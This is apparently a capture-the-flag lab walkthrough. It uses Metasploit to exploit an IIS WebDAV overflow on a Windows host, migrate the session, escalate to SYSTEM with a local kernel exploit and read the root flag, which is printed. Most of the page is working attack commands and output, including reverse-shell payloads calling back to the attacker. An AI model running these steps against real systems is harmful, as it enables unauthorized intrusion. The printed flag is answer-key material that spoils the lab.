Exploitation
Last updated
Was this helpful?
Last updated
Was this helpful?
msfconsole
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set RHOST 10.10.10.14
set LHOST tun0
run We have gotten a shell, unfortunatley, when we try to runn getuid it does not work and we get an error. This means we are running an unstable process. To fix this, we have to check what processes are running on the box and migrate to the one that is running with the same priveleges that the meterpreter session is running with.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
276 4 smss.exe
324 276 csrss.exe
348 276 winlogon.exe
396 348 services.exe
408 348 lsass.exe
584 396 svchost.exe
680 396 svchost.exe
740 396 svchost.exe
764 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1084 396 cisvc.exe
1104 1852 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
1124 396 svchost.exe
1180 396 inetinfo.exe
1216 396 svchost.exe
1324 396 VGAuthService.exe
1408 396 vmtoolsd.exe
1456 396 svchost.exe
1492 348 logon.scr
1628 396 alg.exe
1664 396 svchost.exe
1796 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1852 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
1916 396 dllhost.exe
2304 584 wmiprvse.exe
2692 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3872 1084 cidaemon.exe
3916 1084 cidaemon.exe
3944 1084 cidaemon.exe
migrate 1852Now we have a stable working meterpreter session. We have low privleges, however we need to Escalate to SYSTEM. Put the session in background and use local exploit suggestor local_exploit_suggester
search local_exploit_suggester
use local_exploit_suggester
set SESSION 1
run
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
use exploit/windows/local/ms14_058_track_popup_menu
set SESSION 1
set LHOST tun0
run
shellmeterpreter > shell
Process 1080 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>cd C:\Documents and Settings\Administrator
cd C:\Documents and Settings\Administrator
C:\Documents and Settings\Administrator>cd Desktop
cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 04:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,091,487,232 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b
C:\Documents and Settings\Administrator\Desktop>
